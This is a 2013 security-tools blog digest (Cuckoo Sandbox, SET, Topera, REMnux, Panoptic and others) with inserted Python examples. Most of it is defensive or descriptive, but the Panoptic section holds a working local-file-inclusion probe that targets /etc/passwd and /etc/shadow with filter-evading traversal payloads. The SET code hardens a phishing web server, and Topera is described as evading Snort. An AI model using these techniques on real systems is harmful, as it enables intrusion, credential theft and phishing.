Wednesday, April 17, 2013

[Cuckoo Sandbox v0.6] Software for Automating Analysis of Suspicious Files

Cuckoo Sandbox is open source software for automating the analysis of suspicious files. It does so with custom components that monitor the behaviour of the malicious process while it runs in an isolated environment.

Cuckoo generates several kinds of raw data, including:
  • Native functions and Windows API calls traces
  • Copies of files created and deleted from the filesystem
  • Dump of the memory of the selected process
  • Screenshots of the desktop during the execution of the malware analysis
  • Network dump generated by the machine used for the analysis
To make these results easier to consume, Cuckoo can process them into several kinds of reports, including:
  • JSON report
  • HTML report
  • MAEC report
  • MongoDB interface
  • HPFeeds interface

Cuckoo Sandbox 0.6 (2013-04-15)
===============================
This release represents a major step forward for the quality of the project: you won’t find an endless list of new features this time, but a handful of solid improvements that should make your experience with sandboxing much more pleasant.

Along with a few smaller additions, the focus of 0.6 is the introduction of network logging. Until now, retrieving the analysis results from the analysis machines happened through an inefficient and resource-expensive XMLRPC transaction. With Cuckoo Sandbox 0.6 we are now able to collect behavioral logs, dropped files, screenshots and memory dumps in real time from the analysis machines through a new component called the ResultServer.

The advantages of this approach are multiple:
  • You will now see results arriving in real time.
  • The memory errors and timeouts that used to occur with previous versions when retrieving the results are now gone!
  • Even if the analysis machine is somehow compromised (crashed, shut down or otherwise locked) you will still have complete results up to that point.
  • Probably some more advantages, but it’s already awesome as it is.
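The real-time collection described above, as an added example that is not Cuckoo's own code: a small threaded TCP collector that writes each record to disk the moment it arrives, a constructed guest that streams a few records and then simply drops the connection, and a reader that shows what survived. The one-JSON-object-per-line wire format, the `{"task": N}` hello line and the `ok` acknowledgement are assumptions made for this illustration; Cuckoo's real ResultServer protocol differs.

```python
"""Streaming result collector in the spirit of Cuckoo 0.6's ResultServer.

Added example, not Cuckoo's code. Wire format (an assumption): the guest
sends one hello line {"task": <int>}, receives "ok", then streams one JSON
object per line until it disconnects. There is no end-of-analysis marker:
whatever arrived is already persisted when the guest goes away.
"""
import json
import os
import socket
import socketserver
import tempfile
import threading

# Constructed sample stream: what a guest-side agent might send. The third
# line is deliberate garbage (a hijacked or crashing agent) and must be dropped.
SAMPLE_LINES = [
    b'{"api": "NtCreateFile", "args": {"path": "C:\\\\Users\\\\Public\\\\a.exe"}}\n',
    b'{"api": "NtWriteFile", "args": {"size": 4096}}\n',
    b'\x00\xff not json at all\n',
    b'{"api": "CreateProcessInternalW", "args": {"cmd": "a.exe"}}\n',
]


class ResultHandler(socketserver.StreamRequestHandler):
    """One connection per analysis guest; records are persisted as they arrive."""

    def handle(self):
        # The hello line selects the task. int() keeps a hostile guest from
        # steering the storage path (no "../" tricks via the task id).
        try:
            task_id = int(json.loads(self.rfile.readline())["task"])
        except (ValueError, KeyError, TypeError):
            return  # malformed hello: drop the connection, store nothing
        self.wfile.write(b"ok\n")
        task_dir = os.path.join(self.server.storage, str(task_id))
        os.makedirs(task_dir, exist_ok=True)
        with open(os.path.join(task_dir, "behavior.jsonl"), "ab") as log:
            try:
                for line in self.rfile:
                    if not line.strip():
                        continue
                    try:
                        json.loads(line)  # reject non-JSON noise from the guest
                    except ValueError:
                        continue
                    log.write(line)
                    log.flush()             # on disk before the next record is read,
                    os.fsync(log.fileno())  # so a guest crash loses nothing
            except OSError:
                pass  # guest vanished mid-stream: keep what we already have


class ResultServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = False  # server_close() then joins the handler threads

    def __init__(self, address, storage):
        super().__init__(address, ResultHandler)
        self.storage = storage


def start_server(storage, host="127.0.0.1", port=0):
    server = ResultServer((host, port), storage)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def simulate_guest(port, hello, lines):
    """Constructed stand-in for the in-VM agent: stream, then just drop the socket."""
    with socket.create_connection(("127.0.0.1", port)) as sock:
        sock.sendall(hello)
        if sock.recv(3) != b"ok\n":
            return  # server refused the hello
        for line in lines:
            sock.sendall(line)


def read_records(storage, task_id):
    path = os.path.join(storage, str(task_id), "behavior.jsonl")
    if not os.path.exists(path):
        return []
    with open(path, "rb") as fh:
        return [json.loads(line) for line in fh if line.strip()]


def collect_from_guest(lines, hello=b'{"task": 7}\n', task_id=7):
    """End-to-end run on an ephemeral port; returns the persisted records."""
    storage = tempfile.mkdtemp(prefix="resultserver-")
    server = start_server(storage)
    try:
        simulate_guest(server.server_address[1], hello, lines)
    finally:
        server.shutdown()
        server.server_close()  # waits for the handler, so the log is final
    return read_records(storage, task_id)


if __name__ == "__main__":
    for record in collect_from_guest(SAMPLE_LINES):
        print(record["api"])
```

Because each record is flushed and fsynced before the next one is read, a guest that crashes, is powered off or has its agent killed by the sample leaves a complete log up to that point, which is the property the release note is describing. Run the file directly to see the three surviving API names printed; the garbage line and a malformed hello both leave nothing behind.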

- Added procmemdump option to all analysis packages
- Added randomization of folders and pipes in the analysis machines
- Added checks to block injection of Cuckoo's agent and analyzer
- Added configuration file for processing modules
- Added result server to collect logs, files, screenshots and all results in real-time
- Added option for enabling/disabling generation of CSV logs
- Added REST API function to delete analysis task
- Added matching of Yara signatures against dropped files
- Added default fail-over to the "exe" package when the correct one cannot be identified automatically
- Added password option to zip package
- Improved human auxiliary module
- Improved Sleep() bypass
- Improved dump of dropped files by tracking writing operations
- Improved creation of screenshots by calculating a diff threshold
- Fixed memory error issues
- Fixed bugs in analysis procedure logic and in deletion of original files
- Fixed bugs in MongoDB reporting module
- Fixed bugs in HTML reporting module
- Fixed bugs in VirusTotal processing module
- Fixed bug in handling GetLastError() result
- Fixed bug in network traffic capture
- Fixed bug in submission and creation of tasks in the database
- Removed hooks for NtOpenProcess, NtClose, NtAllocateVirtualMemory and VirtualFreeEx because of stability issues

[SET Version 5.0] The Social-Engineer Toolkit "The Wild West"


Social-Engineer Toolkit (SET) v5.0, codename "The Wild West", is the culmination of six months of development, bug squashing, and user feedback. New in this version is a completely redesigned multiprocessing web server that handles non-RFC-compliant HTTP. The built-in SET web server would on occasion crash when receiving unexpected characters; the new web server is stable and significantly faster. This version is Kali Linux compliant (FHS): all state has been moved out of src/program_junk and into your ~/.set home directory.

In addition to the FHS structuring of SET, we have also added some significant performance and stability updates. For example, previously, if you launched an attack you had to exit SET completely and then relaunch it. The dynamic importing has been changed to fix this and improve the ability to reuse modules.
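As an added example (not SET's code) of the failure mode described above: the fragile three-field unpack that many small Python web servers use, next to a tolerant request-line parser that answers 400 instead of raising. The sample requests, the accepted method list and the landing-page body are constructed for this illustration and say nothing about how SET's server is actually written.

```python
"""Request-line parsing that survives non-RFC HTTP, beside the fragile form.

Added example, not SET's code. Both parsers are illustrations: the fragile
one mirrors a common idiom, the tolerant one is one reasonable hardening.
"""
import re
import socketserver

# Constructed samples: one well-formed request, then the kind of non-RFC
# traffic a phishing landing page sees from scanners, odd proxies and
# hand-typed telnet sessions.
SAMPLES = [
    b"GET /index.html HTTP/1.1\r\nHost: x\r\n\r\n",
    b"GET /index.html\r\n\r\n",                 # no version, HTTP/0.9 style
    b"GET  /a b.html   HTTP/1.1\n\n",           # runs of spaces, space in path, bare LF
    b"\xff\xfe GET / HTTP/1.1\r\n\r\n",          # leading non-ASCII garbage
    b"\r\n",                                    # empty request line
]


def fragile_parse(raw):
    """The crash-prone idiom: exactly three space-separated ASCII fields.
    Anything else raises, and in a single-process server that is the crash."""
    method, target, version = raw.decode("ascii").split("\r\n", 1)[0].split(" ")
    return {"method": method, "target": target, "version": version}


def fragile_survives(raw):
    try:
        fragile_parse(raw)
        return True
    except (ValueError, UnicodeDecodeError):
        return False


_REQUEST_LINE = re.compile(rb"^\s*([A-Z]{3,10})\s+(\S(?:.*?\S)?)\s*(?:HTTP/(\d)\.(\d))?\s*$")


def tolerant_parse(raw):
    """Never raises: a dict for anything request-shaped, else None."""
    line = raw.split(b"\n", 1)[0].rstrip(b"\r")
    match = _REQUEST_LINE.match(line)
    if not match:
        return None
    method, target, major, minor = match.groups()
    version = f"HTTP/{major.decode()}.{minor.decode()}" if major else "HTTP/0.9"
    return {"method": method.decode("ascii"),
            "target": target.decode("latin-1"),  # total decoding: odd bytes survive
            "version": version}


ACCEPTED_METHODS = ("GET", "POST", "HEAD")  # assumption for this illustration


def respond(raw):
    """(status, wire bytes): 400 for junk, and never an exception."""
    request = tolerant_parse(raw)
    if request is None or request["method"] not in ACCEPTED_METHODS:
        return 400, b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\nConnection: close\r\n\r\n"
    body = b"<html><body>landing page</body></html>"
    head = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: %d\r\nConnection: close\r\n\r\n"
    return 200, head % len(body) + body


class Handler(socketserver.StreamRequestHandler):
    def handle(self):
        _, reply = respond(self.rfile.readline(8192))  # request line is all we need here
        self.wfile.write(reply)


# ThreadingTCPServer is portable; on Unix, socketserver.ForkingTCPServer gives
# the per-process isolation that SET's multiprocessing server relies on.
class Server(socketserver.ThreadingTCPServer):
    allow_reuse_address = True


if __name__ == "__main__":
    for raw in SAMPLES:
        print(fragile_survives(raw), respond(raw)[0], raw[:24])
    with Server(("0.0.0.0", 8080), Handler) as server:
        server.serve_forever()
```

Run it to see that the fragile parser survives only the first sample while `respond()` answers all five; the property that matters for a long-running phishing server is that `respond()` cannot raise, so one odd client never takes the listener down.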
For a full list of changes, the changelog can be found below:

~~~~~~~~~~~~~~~~
version 5.0
~~~~~~~~~~~~~~~~
* fixed a bug that would cause tabnabbing to throw an exception around check_options
* added setcore modules into tabnabbing to allow centralized routines
* fixed a bug that would cause webjacking to throw an exception around check_options
* added git clean -fd prior to set update, this will force a clean when pulling the latest files
* fixed a bug in setup.py that would leave a system not set up properly when installing
* fixed a bug in start_dns() that would cause errors on certain systems upon launch
* added installation script for putting SET into /usr/bin and /usr/share for FSH compliant installer
* added set-update to the installation path, can type that anywhere now
* added set-automate to the list to be typed in anywhere
* fixed a bug that would cause the java applet method to not work a second time in use (reload)
* rewrote MASSIVE amounts of code to no longer use src/program_junk for storage of applications, it's now all under ~/.set
* fixed a os.chdir issue when using it to spawn a web server during java applet, moved to multi processing instead of threading.thread
* fixed a bug that caused credential harvester to throw an exception with the new ~/.set directory structure
* centralized setdir into the main repository to handle it through there and to call the ~/.set directory
* added additional passwords to wordlist.txt used for fast-track mssql brute forcing
* fixed a mssql access bug that would cause fast-track to error out if unspecified IP was added
* removed the pymssql check from the initial SET start and onto Fast-Track since it’s only used there
* turned java repeater to ON by default, much better success rate in SE pentesting
* rewrote large portions of payloadgen to incorporate the changes to the new ~/.set path variables
* added a new file structure to launch set called se-toolkit. The set executable is now deprecated and should no longer be used – to launch set just type ./se-toolkit
* updated the setup.py installation to be more robust when performing installations (windows, etc.)
* moved all of the reporting structures within SET to the new ~/.set directory
* added a checkup routine in set and se-toolkit to check for the reports directory
* fixed a bug that would cause multi powershell injection to trigger even when using the powershell menu, it will just generate one now
* fixed an issue that could cause powershell injection to not work properly using the fast patch method
* fixed an issue that would cause definepath to not be specified when using the SE Toolkit Interactive shell
* fixed relative path issues in sccm_main and powershell teensy vectors to point to new .set directory
* fixed an issue that would cause the SE toolkit to hang on a weird bug when importing binascii – moved binascii to main import above and no longer hung
* fixed a before assignment error when using the windows debug conversion in the fast-track mssql menu (meta_path reference)
* changed reports directory within the teensy side to move to ~/.set/reports
* moved the report_generator in harvester to pull and report on the new ~/.set reports structure
* fixed an issue where webjacking would not post properly on certain websites (index2.html conflict issue)
* added the Metasploit MS13-009-IE SLayoutrun Use After Free Exploit to the Metasploit Browser Exploit attacks
* fixed a parsing issue with the JMX bean exploit in the SET menu text from appearing to be on one line
* added a new description on setting up sendmail for Kali Linux
* added a check for multi powershell injection and check for solo instances through powershell teensy and not to generate a ton
* changed the email handler from control-c to END instead. Control-C will break multiprocessing within src.html.spawn and this is the proper way to do it
* cleaned up setcore with old code and optimized other areas of the code base
* reduced the description of the allports payload when selecting in web attack method
* added a completely new and redesigned multi threaded and multiprocessing web server – should be significantly faster with less bugs and crashing when handling non-rfc compliant HTTP requests
* optimized applet load time to be much more efficient when being loaded into the web attack vector (about 4 seconds improvement)
* rewrote exceptions handler for the new web server to check to see if anything is running on port 80 when starting
* turned java repeater to on by default – more stable and tested on multiple platforms
* fixed an issue that would cause the java applet web cloner to fail upon running it twice – added reload(module) option to fix the bug
* fixed an issue that caused powershell.prep to not load if used twice
* fixed an import error when using powershell injection through the main menu
* changed initial set menu in powershell to be the standard setprompt
* changed the default port to 443 on powershell delivery in the set option number 10
* fixed an issue that would cause the powershell injection to spawn on port 22 versus 443 as specified
* removed the man left in the middle attack – no longer in use, outdated and not maintained
* removed beautifulsoup as a dependency for SET due to the removal of man left in the middle
* added the ability to call the web server and stop it based on stop_server()

Monday, April 15, 2013

[Topera] The IPv6 port scanner invisible to Snort (IDS)


Topera is a brand new TCP port scanner for IPv6, with the particularity that its scans are not detected by Snort.

Snort is the best-known IDS/IPS and is widely used in many different critical environments. Some commercial products (Juniper and Check Point ones, for example) also use it as their detection engine.

Evading Snort's detection capabilities could pose a high risk in some cases.

The whole community is invited to test it in any environment, and we would be grateful for any feedback you send us.

We keep researching the security implications that the "new" IPv6 protocol will have in different environments.


[Canari Framework] Maltego Rapid Transform Development Framework


Canari is a rapid transform development framework for Maltego written in Python. The original focus of Canari was to provide a set of transforms that would aid in the execution of penetration tests and vulnerability assessments. Ever since its first prototype, it has become evident that the framework can be used for much more than that. Canari is perfect for anyone wishing to graphically represent their data in Maltego without the hassle of learning a whole bunch of unnecessary stuff. It has generated interest from digital forensics analysts to pen-testers, and even psychologists.

Canari's core features include:
  • An easily extensible and configurable framework that promotes maximum reusability;
  • A set of powerful and easy-to-use scripts for debugging, configuring, and installing transforms;
  • Finally, a great number of community-provided transforms.

Sunday, April 14, 2013

[REMnux] A Linux Distribution for Malware Analysis

REMnux incorporates a number of tools for analyzing malicious executables that run on Microsoft Windows, as well as browser-based malware, such as Flash programs and obfuscated JavaScript. This popular toolkit includes programs for analyzing malicious documents, such as PDF files, and utilities for reverse-engineering malware through memory forensics.

REMnux can also be used for emulating network services within an isolated lab environment when performing behavioral malware analysis. As part of this process, the analyst typically infects another laboratory system with the malware sample and redirects the connections to the REMnux system listening on the appropriate ports.
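The redirection step above (pointing the infected guest at the analysis box), as an added example that is not a REMnux tool: a fake DNS resolver that answers every A query with the lab machine's address, plus a constructed client query and a response parser so the exchange can be checked offline. The 10.0.0.2 lab address, the 60 second TTL and the decision to return an empty NOERROR answer for non-A queries are assumptions made for this illustration.

```python
"""Minimal fake DNS resolver: every A query resolves to the lab box, so an
infected guest's connections land on the fake services listening there.

Added example, not a REMnux tool. LAB_IP, the TTL and the handling of
non-A queries are assumptions for this illustration.
"""
import socket
import struct

LAB_IP = "10.0.0.2"  # assumed address of the analysis box running the fake services


def parse_qname(packet, offset=12):
    """Decode the name at `offset`; returns (dotted name, offset after it)."""
    labels = []
    while True:
        length = packet[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0:  # compression pointers do not belong in a stub's question
            raise ValueError("compressed name in question")
        labels.append(packet[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length


def parse_query(packet):
    if len(packet) < 12:
        raise ValueError("short packet")
    txid, flags, qdcount = struct.unpack("!HHH", packet[:6])
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not a single-question query")
    name, end = parse_qname(packet)
    qtype, qclass = struct.unpack("!HH", packet[end:end + 4])
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass,
            "question": packet[12:end + 4]}


def build_redirect_response(packet, redirect_ip=LAB_IP, ttl=60):
    """A/IN queries get redirect_ip; anything else gets NOERROR with no
    records, so a sample that asked for AAAA first still goes on to ask for A."""
    query = parse_query(packet)
    answers = []
    if query["qtype"] == 1 and query["qclass"] == 1:
        # 0xC00C = pointer to the name in the question section at offset 12
        answers.append(b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4)
                       + socket.inet_aton(redirect_ip))
    flags = 0x8180  # QR=1, RD=1, RA=1, RCODE=0
    header = struct.pack("!HHHHHH", query["id"], flags, 1, len(answers), 0, 0)
    return header + query["question"] + b"".join(answers)


def build_query(name, txid=0x1234, qtype=1):
    """Constructed client query, shaped like what a guest's stub resolver sends."""
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", qtype, 1)


def parse_answer_ips(response):
    """A-record addresses from a response built above (each RR uses the
    2-byte name pointer, so the fixed part is 12 bytes before rdata)."""
    ancount = struct.unpack("!H", response[6:8])[0]
    _, end = parse_qname(response)
    pos, ips = end + 4, []
    for _ in range(ancount):
        rdlen = struct.unpack("!H", response[pos + 10:pos + 12])[0]
        ips.append(socket.inet_ntoa(response[pos + 12:pos + 12 + rdlen]))
        pos += 12 + rdlen
    return ips


def serve(bind="0.0.0.0", port=53):
    """Run the redirector; point the infected guest's DNS setting at this host."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.bind((bind, port))
        while True:
            packet, peer = sock.recvfrom(512)
            try:
                query = parse_query(packet)
                print(f"{peer[0]} asked for {query['name']} (type {query['qtype']})")
                sock.sendto(build_redirect_response(packet), peer)
            except (ValueError, IndexError, struct.error):
                pass  # malformed or unsupported: drop it, never crash the lab resolver


if __name__ == "__main__":
    print(parse_answer_ips(build_redirect_response(build_query("c2.evil.example"))))
```

Set the guest's DNS server to the host running `serve()` (binding port 53 needs root) and every name the sample resolves lands on whatever fake HTTP, IRC or SMTP listener you run on the lab box; the printed query log is itself a useful behavioural indicator, since it records the domains the sample tried to reach.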

You can learn the malware analysis techniques that make use of the tools installed and pre-configured on REMnux by taking the Reverse-Engineering Malware course that my colleagues and I teach at SANS Institute.

REMnux focuses on the most practical freely-available malware analysis tools that run on Linux. If you are looking for a more full-featured distribution that incorporates a broader range of digital forensic analysis utilities, take a look at SANS Investigative Forensic Toolkit (SIFT) Workstation.

Originally released in 2010, REMnux has been updated to version 4 in April 2013.


What’s New in REMnux v4

REMnux is now available as an Open Virtualization Format (OVF/OVA) file for improved compatibility with virtualization software, including VMware and VirtualBox. (Here's how to easily install the REMnux virtual appliance.) A proprietary VMware file is also available. You can also get REMnux as an ISO image of a Live CD.

Key updates to existing tools and components:

New tools added to REMnux:

Getting Started With REMnux

The one-page REMnux Usage Tips cheat sheet outlines some of the more popular tools installed on REMnux. Feel free to customize it to incorporate your own tips and tricks.

The recorded Malware Analysis Essentials Using REMnux webcast provides a good overview and examples of some of the tools for performing static malware analysis.

If you find REMnux useful, take a look at the reverse-engineering malware course. It makes use of REMnux and various other tools.

[ExploitSearch.net] Exploit / Vulnerability Search Engine



Exploitsearch.net is an attempt at cross-referencing and correlating exploit and vulnerability data from various sources and making the resulting database available to everyone.

Unlike other exploit search engines, which are simply custom Google searches, this site actually crawls the source databases and websites and parses the contained data. Once the data is collected and parsed, it is inserted into the www.exploitsearch.net database and becomes available for searching.


Saturday, April 13, 2013

[Panoptic] Automates the process of search and retrieval of content for common log and config files through LFI vulnerability


Panoptic is an open source penetration testing tool that automates the search for, and retrieval of, common log and config files through an LFI vulnerability. The official introductory post can be found here. Also, you can find a sample run here.

Help Menu

Usage: panoptic.py --url TARGET [options]

Options:
-h/--help show this help message and exit
-v/--verbose display extra output information
-u/--url=URL set target URL
-p/--param=PARAM set parameter name to test for (e.g. "page")
-d/--data=DATA set data for HTTP POST request (e.g. "page=default")
-t/--type=TYPE set type of file to look for ("conf" or "log")
-o/--os=OS set filter name for OS (e.g. "*NIX")
-s/--software=SOFT.. set filter name for software (e.g. "PHP")
-c/--category=CATE.. set filter name for category (e.g. "FTP")
-l/--list=GROUP list available filters for group (e.g. "software")
-a/--auto avoid user interaction by using default options
-w/--write-files write content of retrieved files to output folder
-x/--skip-parsing skip special tests if *NIX passwd file is found
--ignore-proxy ignore system default HTTP proxy
--proxy=PROXY set proxy (e.g. "socks5://192.168.5.92")
--user-agent=UA set HTTP User-Agent header value
--random-agent choose random HTTP User-Agent header value
--cookie=COOKIE set HTTP Cookie header value (e.g. "sid=foobar")
--header=HEADER set a custom HTTP header (e.g. "Max-Forwards=10")
--prefix=PREFIX set prefix for file path (e.g. "../")
--postfix=POSTFIX set postfix for file path (e.g. "")
--multiplier=MULTI.. set multiplication number for prefix (e.g. 10)
--bad-string=STRING set a string occurring when file is not found
--replace-slash=RE.. set replacement for char / in paths (e.g. "/././")
--update update Panoptic from official repository

Examples

./panoptic.py --url "http://localhost/lfi.php?file=test.txt"
./panoptic.py --url "http://localhost/lfi.php?file=test.txt&id=1" --param file
./panoptic.py --url "http://localhost/lfi.php" --data "file=test.txt&id=1" --param file

./panoptic.py --list software
./panoptic.py --list category
./panoptic.py --list os

./panoptic.py -u "http://localhost/lfi.php?file=test.txt" --os Windows
./panoptic.py -u "http://localhost/lfi.php?file=test.txt" --software WAMP
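The prefix, multiplier, replace-slash and bad-string options from the help above, as an added example that is not Panoptic's code: a candidate generator, a "found" heuristic, and the passwd follow-up that `--skip-parsing` turns off. The vulnerable target is a constructed in-memory stand-in (an unsanitised `include("pages/" . $_GET["file"])`) so the block runs offline; the file contents, the web-root depth and the PHP warning text are assumptions.

```python
"""Worked LFI probe in the spirit of Panoptic's --prefix/--multiplier/
--postfix/--replace-slash/--bad-string options.

Added example, not Panoptic's code. The target is a constructed stand-in
so the block runs offline; the filesystem, the warning text and the
web-root depth are assumptions for this illustration.
"""
import posixpath
import re
import urllib.parse

# Constructed target: a PHP page doing include("pages/" . $_GET["file"])
# under /var/www/pages with no sanitisation, and two files worth reading.
FAKE_FS = {
    "/etc/passwd": ("root:x:0:0:root:/root:/bin/bash\n"
                    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"),
    "/etc/apache2/apache2.conf": 'ServerRoot "/etc/apache2"\nInclude ports.conf\n',
}
WARNING = "Warning: include(/var/www/pages/{}): failed to open stream"


def vulnerable_page(file_param):
    """Stand-in server side: the OS resolves '..' and '.' the way normpath does."""
    resolved = posixpath.normpath("/var/www/pages/" + file_param)
    return FAKE_FS.get(resolved, WARNING.format(file_param))


def fetch(url):
    """Offline GET: pull the parameter out of the URL and ask the fake app.
    Against a real target, replace with urllib.request.urlopen(url).read().decode()."""
    query = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    return vulnerable_page(query.get("file", [""])[0])


def candidates(path, prefix="../", multiplier=6, postfix="", replace_slash=None):
    """Traversal payloads for one absolute path, shallowest first: the
    --prefix, --multiplier, --postfix and --replace-slash knobs."""
    relative = path.lstrip("/")
    for depth in range(1, multiplier + 1):
        payload = prefix * depth + relative + postfix
        if replace_slash:
            payload = payload.replace("/", replace_slash)
        yield payload


def looks_found(body, bad_string="failed to open stream"):
    """The --bad-string idea: a non-empty body that lacks the error marker."""
    return bool(body.strip()) and bad_string not in body


def probe(base_url, param, paths, fetch=fetch, bad_string="failed to open stream", **opts):
    """Returns {path: first payload that retrieved it}; untouchable files are absent."""
    hits = {}
    for path in paths:
        for payload in candidates(path, **opts):
            body = fetch(f"{base_url}?{urllib.parse.urlencode({param: payload})}")
            if looks_found(body, bad_string):
                hits[path] = payload
                break
    return hits


PASSWD_LINE = re.compile(
    r"^(?P<user>[^:\n]+):[^:\n]*:\d+:\d+:[^:\n]*:(?P<home>[^:\n]+):(?P<shell>[^:\n]*)$", re.M)


def homes_from_passwd(body):
    """The 'special test' that --skip-parsing disables: home directories of
    users with a real shell, which seed a second pass for <home>/.bash_history etc."""
    return [m.group("home") for m in PASSWD_LINE.finditer(body)
            if not m.group("shell").endswith("nologin")]


if __name__ == "__main__":
    base = "http://localhost/lfi.php"
    hits = probe(base, "file", ["/etc/passwd", "/etc/apache2/apache2.conf", "/etc/shadow"])
    print(hits)
    print(homes_from_passwd(fetch(f"{base}?file={hits['/etc/passwd']}")))
```

The depth at which the first hit lands (three here) is exactly what Panoptic's `--multiplier` walks through, and the `/./` variant shows why `--replace-slash` exists: the resolved path is identical, but a filter matching the literal `../` string no longer sees it.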